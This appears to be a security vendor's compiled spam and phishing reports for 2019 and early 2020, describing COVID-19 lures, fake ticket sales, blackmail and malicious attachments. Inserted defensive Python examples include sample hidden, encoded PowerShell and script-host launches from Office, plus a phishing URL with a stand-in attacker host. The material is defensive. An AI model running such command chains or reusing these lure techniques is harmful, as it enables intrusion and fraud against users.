In our summary of the first quarter, we hypothesized that COVID-19 would remain spammers’ and phishers’ key theme in the future. That is exactly what happened: seldom did a mailshot fail to mention the pandemic as phishers added relevance to their tried and tested schemes and came up with brand-new ones.

The average share of spam in global email traffic in Q2 2020 dropped by 4.43 p.p. to 50.18 percent compared to the previous reporting period, and attempts to access phishing pages amounted to 106 million.

First place in the list of spam sources in Q2 went to Russia with a share of 18.52 percent. Our security solutions blocked a total of 43,028,445 malicious email attachments, with the most widespread “email-specific” malware family being Trojan.Win32.Agentb.gen, which infected 13.33 percent of the total email traffic.

Spam and phishing in Q1 2020 (https://securelist.com/spam-and-phishing-in-q1-2020/97091/), Tue, 26 May 2020

Quarterly highlights

Don’t get burned

Burning Man is one of the most eagerly awaited events among fans of spectacular performance and installation art. The main obstacle to attending is the price of admission: a standard ticket will set you back $475, the number is limited, and the buying process is a challenge all by itself (there are several stages, registration data must be entered at a specific time, and if something goes wrong you might not get a second chance). Therefore, half-price fake tickets make for excellent bait.

Scammers tried to make their website as close as possible to the original — even the page with the ticket description looked genuine.

There were just three major differences from the original: only the main page and the ticket purchase section were actually operational, tickets were “sold” without prior registration, and the price was a steal ($225 versus $475).

Oscar-winning scammers

February 2020 saw the 92nd Academy Awards ceremony. Even before the big night, websites were popping up offering free viewings of all the nominated films. Fraudsters targeted users eager to see the short-listed movies before the presentation of the awards.

To promote these sites, Twitter accounts were created — one for each nominated film.

Curious users were invited to visit the resource, where they were shown the first few minutes before being asked to register to continue watching.

During registration, the victim was prompted to enter their bank card details, allegedly to confirm their region of residence. Unsurprisingly, a short while later a certain amount of money disappeared from their account, and the movie did not resume.

Users should be alert to the use of short links in posts on social networks. Scammers often use them because it’s impossible to see where a shortened URL points without actually following it.

There are special services that let you check what lies behind such links, often with an additional bonus in the form of a verdict on the safety of the website content. It is important to do a proper check on links from untrusted sources.

ID for hire

US companies that leak customer data can be heavily fined by the Federal Trade Commission (FTC). For example, in 2019 Facebook was slapped with a $5 billion penalty; however, users whose data got stolen do not receive any compensation. This is what scammers decided to exploit by sending a fake e-mail offering compensation from the non-existent Personal Data Protection Fund, created by the equally fictitious US Trading Commission.

Inspired by the idea of services for checking accounts for leaks, the cybercriminals decided to create their own. Visitors were invited to check whether their account details had been stolen, and if so (the answer was “yes” even if the input was gibberish), they were promised compensation “for the leakage of personal data.”

To receive “compensation,” the victim’s citizenship was of no consequence — what mattered was their first name, last name, phone number, and social network accounts. For extra authenticity, a warning message about the serious consequences of using other people’s data to claim compensation popped up obsessively on the page.

To receive the payment, US citizens were asked to enter their Social Security Number (SSN). Everyone else had to check the box next to the words “I’am don’t have SSN” (the mistakes are a good indicator of a fake), whereupon they were invited to “rent” an SSN for $9. Interestingly, even if the user already had an SSN, they were still pestered to get another one.

After that, the potential victim was redirected to a payment page with the amount and currency based on the user’s location. For instance, users in Russia were asked to pay in rubles.

The scam deployed the conventional scheme (especially common in the Runet) of asking the victim to pay a small commission or down payment for the promise of something much bigger. In Q1, 14,725,643 attempts to redirect users to such websites were blocked.

Disaster and pandemic

Fires in Australia

The natural disaster that hit the Australian continent was another get-rich opportunity for scammers. For example, one “Nigerian prince”-style e-mail scam reported that a millionaire dying of cancer was ready to donate her money to save the Australian forests. The victim was asked to help withdraw the funds from the dying woman’s account by paying a fee or making a small contribution to pay for the services of a lawyer, for which they would be rewarded handsomely at a later date.

Besides the fictional millionaire, other “nature lovers” were keen to help out — their e-mails were more concise, but the scheme was essentially the same.

COVID-19

“Nigerian prince” scheme

COVID-19 was (and continues to be) a boon to scammers: non-existent philanthropists and dying millionaires are popping up everywhere offering rewards for help to withdraw funds supposedly for humanitarian purposes. Some recipients were even invited to help finance the production of a miracle vaccine, or take part in a charity lottery, the proceeds of which, it was said, would be distributed to poor people affected by the pandemic.

Bitcoin for coronavirus

Having introduced themselves as members of a healthcare organization, the scammers appealed to the victim to transfer a certain sum to the Bitcoin wallet specified in the message. The donation would allegedly go toward fighting the coronavirus outbreak and developing a vaccine, as well as helping victims of the pandemic.

In one e-mail, the attackers played on people’s fear of contracting COVID-19: the message was from an unnamed “neighbor” claiming to be dying from the virus and threatening to infect the recipient unless the latter paid a ransom (which, it was said, would help provide a comfortable old age for the ransomer’s parents).

Dangerous advice from the WHO

One fraudulent mailing disguised as a WHO newsletter offered tips about staying safe from COVID-19.

To get the information, the recipient had to click a link pointing to a fake WHO website. The design was so close to the original that only the URL gave away the scam. The cybercriminals were after login credentials for accounts on the official WHO site. Whereas in the first mailings only a username and password were asked for, in later ones a phone number was also requested.

In addition, we detected several e-mails supposedly from the WHO containing documents with malware. The recipient was asked to open the attachment (in DOC or PDF format), which allegedly offered coronavirus prevention advice. For example, this message contained Backdoor.Win32.Androm.tvmf:

There were other, less elaborate mailings with harmful attachments, including ones containing Trojan-Spy.Win32.Noon.gen:


Corporate segment

The coronavirus topic was also exploited in attacks on the corporate sector. For example, COVID-19 was cited in fraudulent e-mails as a reason for delayed shipments or the need to reorder. The authors marked the e-mails as urgent and demanded that the attached files be checked immediately.

Another mailing prompted recipients to check whether their company was on a list of firms whose activities had been suspended due to the pandemic, and then asked for a form to be filled out, failing which the company could be shut down. Both the list of companies and the form were allegedly in the archives attached to the message. In actual fact, the attachments contained Trojan-PSW.MSIL.Agensla.a:

We also registered a phishing attack on corporate users. On a fake page, visitors were invited to monitor the coronavirus situation across the world using a special resource, for which the username and password of the victim’s corporate mail account were required.

Government compensation

The introduction of measures to counter the pandemic put many people in a difficult financial situation. Forced downtime in many industries has had a negative impact on financial well-being. In this climate, websites offering compensation from the government pose a particular danger.

One such popular scheme was highlighted by a colleague of ours from Brazil. WhatsApp messages about financial or food assistance were sent that appeared to come from a supermarket, bank, or government department. To receive the aid, the victim had to fill out the attached form and share the message with a certain number of contacts. After the form was filled out, the data was sent to the cybercriminals, while the victim got redirected to a page with advertising, a phishing site, a site offering a paid SMS subscription, or similar.

Given that the number of fake sites offering government handouts seems likely only to increase, we urge caution when it comes to promises of compensation or material assistance.

Anti-coronavirus protection with home delivery

Due to the pandemic, demand for antiseptics and antiviral agents has spiked. We registered a large number of mailings with offers to buy antibacterial masks.

In Latin America, WhatsApp mass messages were used to invite people to take part in a prize draw for hand sanitizer products from the brewing company Ambev. The company has indeed started making antiseptics and hand gel, but exclusively for public hospitals, so the giveaway was evidently the work of fraudsters.

The number of fake sites offering folk remedies for the treatment of coronavirus, drugs to strengthen the immune system, and non-contact thermometers and test kits has also risen sharply. Most of the products on offer have no kind of certification whatsoever.

On average, the daily share of e-mails mentioning COVID-19 in Q1 amounted to around 6% of all junk traffic. More than 50% of coronavirus-related spam was in the English language. We anticipate that the number of phishing sites and pandemic-related scams will only increase, and that cybercriminals will use new attack schemes and strategies.

Statistics: spam

Proportion of spam in mail traffic

Proportion of spam in global mail traffic, Q4 2019 – Q1 2020 (download)

In Q1 2020, the largest share of spam was recorded in January (55.76%). The average percentage of spam in global mail traffic was 54.61%, down 1.58 p.p. against the previous reporting period.

Proportion of spam in Runet mail traffic, Q4 2019 – Q1 2020 (download)

In Q1, the share of spam in Runet traffic (the Russian segment of the Internet) likewise peaked in January (52.08%). At the same time, the average indicator, as in Q4 2019, remains slightly lower than the global average (by 3.20 p.p.).

Sources of spam by country


Sources of spam by country, Q1 2020 (download)

In Q1 2020, Russia led the TOP 5 countries by amount of outgoing spam. It accounted for 20.74% of all junk traffic. In second place came the US (9.64%), followed by Germany (9.41%) just 0.23 p.p. behind. Fourth place goes to France (6.29%) and fifth to China (5.22%), which is usually a TOP 3 spam source.

Brazil (3.56%) and the Netherlands (3.38%) took sixth and seventh positions, respectively, followed by Vietnam (2.55%), with Spain (2.34%) and Poland (2.21%) close on its heels in ninth and tenth.

Spam e-mail size


Spam e-mail size, Q4 2019 – Q1 2020 (download)

Compared to Q4 2019, the share of very small e-mails (up to 2 KB) in Q1 2020 fell by more than 6 p.p. and amounted to 59.90%. The proportion of e-mails sized 5-10 KB grew slightly (by 0.72 p.p.) against the previous quarter to 5.56%.

Meanwhile, the share of 10-20 KB e-mails climbed by 3.32 p.p. to 6.36%. The number of large e-mails (100–200 KB) also posted growth (+2.70 p.p.). Their slice in Q1 2020 was 4.50%.

Malicious attachments in e-mail


Number of Mail Anti-Virus triggerings, Q4 2019 – Q1 2020 (download)

In Q1 2020, our security solutions detected a total of 49,562,670 malicious e-mail attachments, which is almost identical to the figure for the last reporting period (there were just 314,862 more malicious attachments detected in Q4 2019).

TOP 10 malicious attachments in mail traffic, Q1 2020

In Q1, first place in terms of prevalence in mail traffic went to Trojan.Win32.Agentb.gen (12.35%), followed by Exploit.MSOffice.CVE-2017-11882.gen (7.94%) in second and Worm.Win32.WBVB.vam (4.19%) in third.

TOP 10 malicious families in mail traffic, Q1 2020

As regards malware families, the most widespread this quarter was Trojan.Win32.Agentb (12.51%), with Exploit.MSOffice.CVE-2017-11882 (7.98%), whose members exploit a vulnerability in Microsoft Equation Editor, in second place and Worm.Win32.WBVB (4.65%) in third.

Countries targeted by malicious mailshots

Distribution of Mail Anti-Virus triggerings by country, Q1 2020

First place by number of Mail Anti-Virus triggerings in Q1 2020 was claimed by Spain. This country accounted for 9.66% of all users of Kaspersky security solutions who encountered e-mail malware worldwide. Second place went to Germany (8.53%), and Russia (6.26%) took bronze.

Statistics: phishing

In Q1 2020, the Anti-Phishing system prevented 119,115,577 attempts to redirect users to scam websites. The percentage of unique attacked users was 8.80% of the total number of users of Kaspersky products in the world.

Attack geography

The country with the largest proportion of users attacked by phishers, not for the first time, was Venezuela (20.53%).

Geography of phishing attacks, Q1 2020

In second place, by a margin of 5.58 p.p., was Brazil (14.95%), another country that is no stranger to the TOP 3. Next came Australia (13.71%), trailing by just 1.24 p.p.

Country %*
Venezuela 20.53%
Brazil 14.95%
Australia 13.71%
Portugal 12.98%
Algeria 12.12%
France 11.71%
Honduras 11.62%
Greece 11.58%
Myanmar 11.54%
Tunisia 11.53%

* Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky users in the country

Organizations under attack

The rating of attacks by phishers on different categories of organizations is based on detections by the Anti-Phishing component of Kaspersky products. This component detects pages with phishing content that the user gets redirected to. It does not matter whether the redirect is the result of clicking a link in a phishing e-mail or in a message on a social network, or the result of malicious program activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

The largest share of phishing attacks in Q1 2020 fell to the Online Stores category (18.12%). Second place went to Global Internet Portals (16.44%), while Social Networks (13.07%) came in third.

Distribution of organizations affected by phishing attacks by category, Q1 2020

As for the Banks category, a TOP 3 veteran, this time it placed fourth with 10.95%.

Conclusion

Glancing at the results of Q1 2020, we anticipate that the COVID-19 topic will continue to be actively used by cybercriminals for the foreseeable future. To attract potential victims, the pandemic will be mentioned even on “standard” fake pages and in spam mailings.

The topic is also used extensively in fraudulent schemes offering compensation and material assistance.

It is highly likely that this type of fraud will become more frequent.

The average share of spam in global mail traffic (54.61%) this quarter decreased by 1.58 p.p. against the previous reporting period, while the number of attempted redirects totaled nearly 120 million.

Top of this quarter’s list of spam-source countries is Russia, with a share of 20.74%. Our security solutions blocked 49,562,670 malicious mail attachments, while the most common mail-based malware family, with a 12.35% share of mail traffic, was Trojan.Win32.Agentb.gen.

Spam and phishing in 2019 (https://securelist.com/spam-report-2019/96527/, Wed, 08 Apr 2020 10:00:10 +0000)

Figures of the year

  • The share of spam in mail traffic was 56.51%, which is 4.03 p.p. more than in 2018.
  • The biggest source of spam this year was China (21.26%).
  • 78.44% of spam e-mails were less than 2 KB in size.
  • Malicious spam was detected most commonly with the Exploit.MSOffice.CVE-2017-11882 verdict.
  • The Anti-Phishing system was triggered 467,188,119 times.
  • 15.17% of unique users encountered phishing.

Beware of novelties

In 2019, attackers were more active than usual in their exploitation of major sports and movie events to gain access to users’ financial or personal data. Premieres of TV shows and films, and sports broadcasts were used as bait for those looking to save money by watching on “unofficial” resources.

A search for “Watch latest X for free” (where X = Avengers movie, Game of Thrones season, Stanley Cup game, US Open, etc.) returned links to sites offering the opportunity to do precisely that. On clicking through to these resources, the broadcast really did begin, only to stop after a couple of minutes. To continue viewing, the user was prompted to create a free account (only an e-mail address and password were required). However, when the Continue button was clicked, the site asked for additional confirmation.

And not just any old information, but bank card details, including the three-digit security code (CVV) on the reverse side. The site administrators assured that funds would not be debited from the card, but that this data was needed only to confirm the user’s location (and hence right to view the content). However, instead of continuing the broadcast, the scammers simply pocketed the details.

New gadgets were also deployed as bait. Cybercriminals created fake pages mimicking official Apple services. The number of fake sites rose sharply after the company unveiled its new products. And while Apple was only just preparing to release the next gadget, fraudsters were offering to “sell” it to those with itchy hands. All the victim had to do was follow a link and enter their Apple ID credentials — the attackers’ objective.

In 2019, scammers found new ways to exploit popular resources and social networks to spread spam and sell non-existent goods and services. They actively used YouTube and Instagram comments to place ads and links to potentially malicious pages, and created numerous social media accounts that they promoted by commenting on the posts of popular bloggers.

For added credibility, they left many fake comments on posts about hot topics. As the account gained a following, it began to post messages about promotions. For example, a sale of branded goods at knock-down prices. Victims either received a cheap imitation or simply lost their cash.

A similar scheme was used to promote get-rich-quick-online videos, coupled with gushing reviews from “newly flush” clients.

Another scam involved fake celebrity Instagram accounts. The “stars” asked fans to take a survey and get a cash payout or the chance to participate in a prize draw. Naturally, a small upfront fee was payable for this unmissable opportunity… After the cybercriminals received the money, the account simply disappeared.

Besides distributing links through comments on social networks, scammers utilized yet another delivery method in the shape of Google services: invitations to meetings sent via Google Calendar or notifications from Google Photos that someone just shared a picture were accompanied by a comment from the attackers with links to fake promotions, surveys, and prize giveaways.

Other Google services were also used: links to files in Google Drive and Google Storage were sent inside fraudulent e-mails, which spam filters are not always able to spot. Clicking such a link usually opened a file with adware (for example, fake pharmaceutical products) or another link leading to a phishing site or a form for collecting personal data.

Although Google and others are constantly working to protect users from scammers, the latter are forever finding new loopholes. Therefore, the main protection against such schemes is to pay careful attention to messages from unfamiliar senders.

Malicious transactions

In Q1, users of the Automated Clearing House (ACH), an electronic funds-transfer system that facilitates payments in the US, fell victim to fraudsters: we registered mailings of fake ACH notifications about the status of a payment or debt. By clicking the link or opening the attachment, the user risked infecting the computer with malware.

Anyone order bitcoin?

Cryptocurrency continues to be of interest to scammers. Alongside the standard fakes of well-known cryptocurrency exchanges, cybercriminals have started creating their own: such resources promise lucrative exchange rates, but steal either personal data or money.

Cryptocurrencies and blackmail

If in 2018 cybercriminals tried to blackmail users by claiming to have malware-obtained compromising material on them, in 2019 e-mails began arriving from a CIA agent (the name varied) supposedly dealing with a case opened against the message recipient pertaining to the storage and distribution of pornographic images of minors.

The case, the e-mail alleged, was part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the “agent” happened to know that the recipient was a well-heeled individual with a reputation to protect, and for $10,000 in bitcoin would be willing to alter or destroy the dossier (all information about the victim to add credence to the e-mail was harvested in advance from social networks and forums). For someone genuinely afraid of the potential consequences, this would be a small price to pay.

Legal entities found themselves in an even more desperate situation when faced with similar threats. However, for them it was not about sextortion, but spamming. The blackmailers sent a message to the company, using its public e-mail address or online feedback form, in which they demanded a ransom in bitcoin. If refused, the attackers threatened to send millions of spam e-mails in the company’s name. This, the cybercriminals assured, would prompt the Spamhaus Project to recognize the resource as a spammer and block it forever.

Corporate sector in the crosshairs

The growing trend for attacks on the corporate sector is reflected not only in the attempts to cyber-blackmail companies. The reputation of many firms has been compromised by spam mailings through feedback forms. Having previously used such forms to attack the mailboxes of company employees, in 2019 cybercriminals evolved their methods.

As such, messages about successful registration on a particular website were received by people who had never even heard of it. After finding a security hole in the site, spammers used a script to bypass the CAPTCHA system and mass-register users via the feedback form. In the Username field, the attackers inserted message text or a link. As a result, the victim whose e-mail address was used received a registration confirmation e-mail from a legitimate sender, but containing a message from the scammers. Moreover, the company itself had no idea that this was going on.
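
The abuse described above turns a site’s own registration e-mail into a spam relay, so the defence belongs in the site’s input validation and in its sign-up telemetry. The following is an added example written for this page, not code from the original report or from any affected site: it rejects a “username” that carries a link or line break, and separately flags a source address that registers accounts in bulk. The registrations are constructed, and the field names, patterns and threshold are assumptions.

```python
import re
from collections import Counter

# Constructed sample of what an abused sign-up or feedback form might log
# (not real data). The "username" field is where the spammer's message ends
# up, so the site's own confirmation e-mail carries it to the victim.
SAMPLE_REGISTRATIONS = [
    {"email": "alice@example.org", "username": "alice_w", "ip": "198.51.100.7"},
    {"email": "bob@example.net", "username": "Claim your prize now http://promo.example/xyz",
     "ip": "203.0.113.9"},
    {"email": "carol@example.com", "username": "carol\nVisit www.deal.example for 90% off",
     "ip": "203.0.113.9"},
    {"email": "dave@example.org", "username": "dave", "ip": "203.0.113.9"},
    {"email": "erin@example.org", "username": "Your prize is waiting! tinyurl.com/abc",
     "ip": "203.0.113.9"},
]

# A display name should be a short identifier: letters, digits, "_" or "-".
ALLOWED_USERNAME = re.compile(r"^[A-Za-z0-9_-]{3,32}$")
# Anything that looks like a link: a scheme, "www.", or a dotted host name.
URL_RE = re.compile(r"https?://|www\.|\b[\w-]+\.[a-z]{2,}(?:/|\b)", re.IGNORECASE)


def username_problems(username):
    """Return the reasons a username would be rejected; an empty list means acceptable."""
    problems = []
    if "\r" in username or "\n" in username:
        problems.append("line break")  # would inject extra lines into the confirmation e-mail
    if URL_RE.search(username):
        problems.append("contains URL")
    if not ALLOWED_USERNAME.fullmatch(username):
        problems.append("not a plain identifier")
    return problems


def triage(registrations, per_ip_threshold=3):
    """Validate each sign-up and flag source IPs that register in bulk.

    Field validation alone misses the sign-up from "dave": his username is
    clean, but the same IP created several accounts, which is the
    mass-registration pattern itself.
    """
    per_ip = Counter(r["ip"] for r in registrations)
    report = []
    for r in registrations:
        reasons = username_problems(r["username"])
        if per_ip[r["ip"]] >= per_ip_threshold:
            reasons.append("bulk sign-ups from %s (%d)" % (r["ip"], per_ip[r["ip"]]))
        report.append({"email": r["email"], "reject": bool(reasons), "reasons": reasons})
    return report


if __name__ == "__main__":
    for row in triage(SAMPLE_REGISTRATIONS):
        print(row)
```

The two checks are deliberately independent: the identifier rule stops the spam text from ever reaching the confirmation template, while the per-IP count is what tells the site owner that the form is being scripted at all.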

A far more serious threat came from mailings masked as automatic notifications from services used to compile legitimate mailing lists: the scammers’ messages were carefully disguised as notifications about new voice messages (some business products have a feature for exchanging voice messages) or about incoming e-mails stuck in the delivery queue. To access them, the employee had to go through an authentication process, whereupon the corporate account credentials ended up in the hands of the attackers.

Scammers devised new methods to coax confidential data out of unsuspecting company employees. For example, by sending e-mails requesting urgent confirmation of corporate account details or payment information with a link conveniently supplied. If the user swallowed the bait, the authentication data for their account went straight to the cybercriminals.

Another attack aimed at the corporate sector employed a more complex scheme: the attackers tried to dupe e-mail recipients into thinking that the company management was offering a pay rise in exchange for taking a performance review.

The message appeared to come from HR and contained detailed instructions and a link to a bogus appraisal form. But before going through the procedure, the recipient had to enter a few details (in most cases it was specified that the e-mail address had to be a corporate one). After clicking the Sign in or Appraisal button, the entered credentials were duly forwarded to the attackers, granting them access to business correspondence, personal data, and probably confidential information too, which could later be used for blackmail or sold to competitors.

A simpler scheme involved sending phishing e-mails supposedly from services used by the company. The most common were fake notifications from HR recruiting platforms.

Statistics: spam

Proportion of spam in mail traffic

The share of spam in mail traffic in 2019 increased by 4.03 p.p. to 56.51%.

Proportion of spam in global mail traffic, 2019

The lowest figure was recorded in September (54.68%), and the highest in May (58.71%).

Sources of spam by country

In 2019, as in the year before, China retained its crown as the top spam-originating country. Its share grew significantly from the previous year (up 9.57 p.p.) to 21.26%. It remains ahead of the US (14.39%), whose share increased by 5.35 p.p. In third place was Russia (5.21%).

Fourth position went to Brazil (5.02%), despite shedding 1.07 p.p. Fifth place in 2019 was claimed by France (3.00%), and sixth by India (2.84%), which ranked the same as the year before. Vietnam (2.62%), fourth in the previous reporting period, moved down to seventh.

The TOP 10 is rounded out by Germany, dropping from third to eighth (2.61%, down by 4.56 p.p.), Turkey (2.15%), and Singapore (1.72%).

Sources of spam by country, 2019

Spam e-mail size

In 2019, the share of very small e-mails continued to grow, but less dramatically than the year before — by just 4.29 p.p. to 78.44%. Meanwhile, the share of e-mails sized 2–5 KB decreased against 2018 by 4.22 p.p. to 6.42%.

Spam e-mails by size, 2019

The share of larger e-mails (10–20 KB) changed insignificantly, down by 0.84 p.p. But there was more junk mail sized 20–50 KB: such messages accounted for 4.50% (+1.68 p.p.). In addition, the number of 50–100 KB e-mails rose by almost 1 p.p., amounting to 1.81%.

Malicious mail attachments

Malware families

Number of Mail Anti-Virus triggerings, 2019

In 2019, our security solutions detected a total of 186 005 096 malicious email attachments. November was the most active month with 19 million Mail Anti-Virus triggerings, while December was the “calmest” — with 7 million fewer.

TOP 10 malware families, 2019

In 2019, like the year before it, Exploit.Win32.CVE-2017-11882 malicious objects were the most commonly encountered malware (7.24%). They exploited a vulnerability in Microsoft Office that allowed arbitrary code to be executed without the user’s knowledge.

In second place is the Trojan.MSOffice.SAgent family (3.59%), whose members also attack Microsoft Office users. This type of malware consists of a document with a built-in VBA script that secretly loads other malware using PowerShell when the document is opened.
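
A document macro that launches PowerShell to fetch a payload is, from the endpoint’s point of view, an Office process spawning a script host, which is how families like this are typically caught regardless of how the macro is obfuscated. Below is an added example, written for this page rather than taken from the original report or from Kaspersky’s products, that applies that parent/child rule to constructed process-creation events. The event shape, field names and scores are assumptions.

```python
import json

# Constructed process-creation events in a simplified Sysmon-like JSON shape
# (not real telemetry). The paths use doubled backslashes as JSON requires.
SAMPLE_EVENTS = r"""
{"ts":"2019-11-04T09:12:01Z","host":"ws01","parent":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <base64 omitted>"}
{"ts":"2019-11-04T09:12:05Z","host":"ws01","parent":"C:\\Windows\\explorer.exe","image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","cmdline":"WINWORD.EXE /n invoice.docm"}
{"ts":"2019-11-04T09:13:44Z","host":"ws02","parent":"C:\\Windows\\System32\\svchost.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -File C:\\scripts\\inventory.ps1"}
{"ts":"2019-11-04T09:15:10Z","host":"ws03","parent":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c wscript.exe C:\\Users\\Public\\update.vbs"}
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Switches commonly present when a macro runs PowerShell so the user notices nothing.
HIDING_SWITCHES = ("-encodedcommand", "-windowstyle hidden", "-w hidden", "-noprofile")


def image_name(path):
    """Lower-case file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons); a score of 0 means the event is not of interest."""
    parent, child = image_name(event["parent"]), image_name(event["image"])
    if parent not in OFFICE_APPS or child not in SCRIPT_HOSTS:
        return 0, []
    # The lineage alone is worth an alert: Office documents have no business
    # starting script interpreters on an ordinary workstation.
    reasons = ["%s spawned %s" % (parent, child)]
    score = 70
    cmd = event["cmdline"].lower()
    hits = [s for s in HIDING_SWITCHES if s in cmd]
    if hits:
        score += 20
        reasons.append("hidden-window/encoded switches: " + ", ".join(hits))
    if "http://" in cmd or "https://" in cmd:
        score += 10
        reasons.append("URL on the command line")
    return min(score, 100), reasons


def detect(event_lines):
    """Run the rule over newline-delimited JSON events and return the alerts."""
    alerts = []
    for line in event_lines.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        score, reasons = score_event(event)
        if score:
            alerts.append({"ts": event["ts"], "host": event["host"],
                           "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Note that the benign PowerShell run from svchost.exe and Word being opened by Explorer produce nothing; only the two Office-to-script-host transitions are reported, with the hidden-window switches raising the score of the first.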

The Worm.Win32.WBVB family (3.11%), which includes executable files written in Visual Basic 6 and classed as untrusted by KSN, rose from fourth place in the rating to third.

Backdoor.Win32.Androm.gen (1.64%), which ranked second in the previous reporting period, dropped to fourth position. This modular backdoor is most often used to download malware onto the victim’s machine.

Fifth place in 2019 was taken by the Trojan.Win32.Kryptik family (1.53%). This verdict is assigned to Trojans that use anti-emulation, anti-debugging, and code obfuscation to make them difficult to analyze.

Trojan.MSIL.Crypt.gen (1.26%) took sixth place, while Trojan.PDF.Badur (1.14%) — a PDF that directs the user to a potentially dangerous site — climbed to seventh.

Eighth position fell to another malicious DOC/DOCX document with a malicious VBA script inside — Trojan-Downloader.MSOffice.SLoad.gen (1.14%), which, when opened, may download ransomware onto the victim’s computer.

In ninth place is Backdoor.Win32.Androm, and propping up the table is Trojan.Win32.Agent (0.92%).

Countries targeted by malicious mailings

As in the previous year, Germany took first place in 2019. Its share remained virtually unchanged: 11.86% of all attacks (+0.35 p.p.). Second place was claimed jointly by Russia and Vietnam (5.77% each) — Russia held this position in the previous reporting period, while Vietnam’s rise to the TOP 3 came from sixth position.

Countries targeted by malicious mailings, 2019

Lagging behind by just 0.2 p.p. is Italy (5.57%), while the UAE is in fifth place (4.74%), Brazil in sixth (3.88%), and Spain in seventh (3.45%). The TOP 10 is rounded out by the practically neck-and-neck India (2.67%), Mexico (2.63%), and Malaysia (2.39%).

Statistics: phishing

In 2019, the Anti-Phishing system was triggered 467 188 119 times on Kaspersky user computers as a result of phishing redirection attempts (15,277,092 fewer than in 2018). In total, 15.17% of our users were attacked.

Organizations under attack

The rating of organizations targeted by phishing attacks is based on the triggering of the heuristic component in the Anti-Phishing system on user computers. This component detects all instances when the user tries to follow a link in an e-mail or on the Internet to a phishing page when such a link has yet to be added to Kaspersky’s databases.
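
The heuristic approach described above can be illustrated at the URL level. The following is an added example written for this page, not Kaspersky’s component or any code from the original report: it flags the patterns the scams on this page rely on, such as a brand name placed in a subdomain or path of a domain that does not belong to the brand, a raw IP host, a punycode label, or a “user@” prefix that makes the real host easy to miss. The brand allowlist, thresholds and the naive registrable-domain logic are assumptions chosen for illustration.

```python
import ipaddress
from urllib.parse import urlsplit

# Brands impersonated in the schemes described on this page, with the domains
# that legitimately belong to them (assumption: a tiny allowlist standing in
# for a maintained one).
KNOWN_BRANDS = {
    "amazon": {"amazon.com", "amazon.co.uk", "amazon.de"},
    "apple": {"apple.com", "icloud.com"},
    "paypal": {"paypal.com"},
    "binance": {"binance.com"},
}
SECOND_LEVEL = {"co", "com", "org", "net", "gov", "ac"}


def registrable_domain(host):
    """Naive registrable domain: last two labels, or three for co.uk-style suffixes."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and labels[-2] in SECOND_LEVEL and len(labels[-1]) == 2:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def phishing_indicators(url):
    """Return heuristic reasons a URL looks like a brand-impersonation page ([] if none)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reg = registrable_domain(host)
    reasons = []

    try:
        ipaddress.ip_address(host)
        reasons.append("host is an IP address")
    except ValueError:
        pass
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode (IDN) label in host")
    if parts.username is not None:
        reasons.append("userinfo (user@) before the real host")
    if host.count("-") >= 3:
        reasons.append("three or more hyphens in host")
    if host.count(".") >= 4:
        reasons.append("deeply nested subdomains")

    # The core check: a brand name anywhere in the URL (including the fake
    # "user@" part) while the registrable domain is not one of the brand's own.
    haystack = (parts.netloc + parts.path).lower()
    for brand, legit in KNOWN_BRANDS.items():
        if reg not in legit and brand in haystack:
            reasons.append("brand '%s' outside its own domain (%s)" % (brand, reg))
    return reasons


if __name__ == "__main__":
    for u in ("https://www.amazon.com/gp/css/homepage.html",
              "https://secure.paypal.com.account-verify.xyz/signin",
              "https://www.paypal.com@evil.example/"):
        print(u, "->", phishing_indicators(u))
```

A brand token in the path of an unrelated but legitimate site (a news article about Amazon, say) will also trip the last check, which is why a heuristic of this kind feeds a verdict rather than being one; the original text makes the same point by pairing the heuristic with a database of known pages.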

Rating of categories of organizations attacked by phishers

In contrast to 2018, in this reporting period the largest share of heuristic component triggers fell to the Banks category. Its slice increased by 5.46 p.p. to 27.16%. Last year’s leader, the Global Internet Portals category, moved down a rung to second. Against last year, its share decreased by 3.60 p.p. (21.12%). The Payment Systems category remained in third place, its share in 2019 amounting to 16.67% (-2.65 p.p.).

Distribution of organizations subject to phishing attacks by category, 2019

Attack geography

Countries by share of attacked users

This period’s leader by percentage of attacked unique users out of the total number of users was Venezuela (31.16%).

Percentage of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky users in the country, 2019

TOP 10 countries by share of attacked users

Country %
Venezuela 31.16
Brazil 30.26
Greece 25.96
Portugal 25.63
Australia 25.24
Algeria 23.93
Chile 23.84
Réunion 23.82
Ecuador 23.53
French Guiana 22.94

Last year’s leader, Brazil (30.26%), this year found itself in second place, shedding 1.98 p.p. and ceding top spot to Venezuela (31.16%), which moved up from ninth position, gaining 11.27 p.p. In third place was TOP 10 newcomer Greece (25.96%).

Wrap-up

TV premieres, high-profile sporting events, and the release of new gadgets were exploited by scammers to steal users’ personal data or money.

In the search for new ways to bypass spam filters, attackers are developing new methods of delivering their messages. This year, they made active use of various Google services, as well as popular social networks (Instagram) and video hosting sites (YouTube).

Cybercriminals continue to use the topic of finance in schemes aimed at gaining access to users’ personal data, infecting computers with malware, or stealing funds from victims’ accounts.

